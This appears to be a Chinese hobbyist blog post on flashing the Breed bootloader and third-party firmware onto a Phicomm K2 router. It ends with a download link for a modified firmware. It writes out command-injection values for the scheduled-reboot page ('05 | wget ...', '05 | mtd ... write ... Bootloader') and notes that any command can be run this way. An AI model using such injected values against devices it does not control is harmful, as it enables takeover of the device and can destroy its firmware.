斐讯K2定时重启漏洞、定时更新漏洞刷breed斐讯K2微信打赏上网固件第三方固件分享

2021-01-25
0评论
/
阅读
爱搜啊

jd拿了个免费的斐讯K2:

软件版本: 22.4.5.42

设备型号: K2

硬件版本: A2

据说有收集用户信息的问题:

需要刷第三方固件或对原版固件进行净化处理

一、斐讯K2刷breed

breed类似uboot,用于路由器的引导,刷了breed后,可以方便的刷第三方固件

这里使用的是利用网页执行脚本的漏洞安装breed

便携机无线连接K2,K2 WAN口连internet,先保证可以正常上网

用Firefox,傲游,Chrome等登录http://192.168.2.1

选择右上角的“定时重启路由器”

点选时间中的右侧下拉分钟选择框,鼠标箭头(手势)放在05上,点击鼠标右键,在Firefox或傲游浏览器“审查元素”(傲游浏览器先按“F12”按键打开审查页面后再点击定时重启):

双击"05",改为你要执行的命令:

斐讯K2定时重启漏洞、定时更新漏洞刷breed

改为:

05 | wget http://breed.hackpascal.net/breed-mt7620-phicomm-psg1208.bin

在定时重启路由器页面上重新选择05之后(这里要注意,一定要重选,并且重选后可以看到05后面自己输入的字符):

点击“保存”按钮后,就相当于K2执行了wget获取文件的命令。

重复上述过程,分别改为:

05 | mtd unlock Bootloader
05 | mtd -r write breed-mt7620-phicomm-psg1208.bin Bootloader

上述操作是利用漏洞执行了3条命令,下载breed并写入bootloader,最后一次保存后,路由器会写breed并重启。

如果路由器没有自动重启,说明操作过程有误,请仔细检查操作过程。

你可以用此方法让K2执行任何命令

二、进入Breed方法

拔除K2上Wan口的网线,路由器断电,持续按住路由器上的reset按钮不松开,接通路由器电源,3秒后松开reset按钮。

在浏览器地址栏输入“http://192.168.1.1”访问Breed Web。

进入Breed Web后,请及时进行原始EEPROM、固件备份,然后再刷其他的固件。

进入Breed方法

斐讯K2微信打赏上网固件分享

斐讯K2微信打赏上网固件分享

1、官方固件净化(禁止可疑程序、关闭升级提示)

2、所有添加应用缺省禁止,初始即为“纯净精简”版本

3、支持广告过滤adbyby和koolproxy

4、支持自动中继、支持WOL网络唤醒

5、使能启动任务和计划(定时)任务,支持Hosts和dnsmasq自定义

6、支持共享wifi、支持官方APP本地和远程管理

具体的升级教程在breed里面刷入即可。

http://dl.iqqoz.com/file/1397394-394148771


本站附件分享,如果附件失效,可以去找找看

诚通网盘附件百度网盘附件


于2021-01-25发布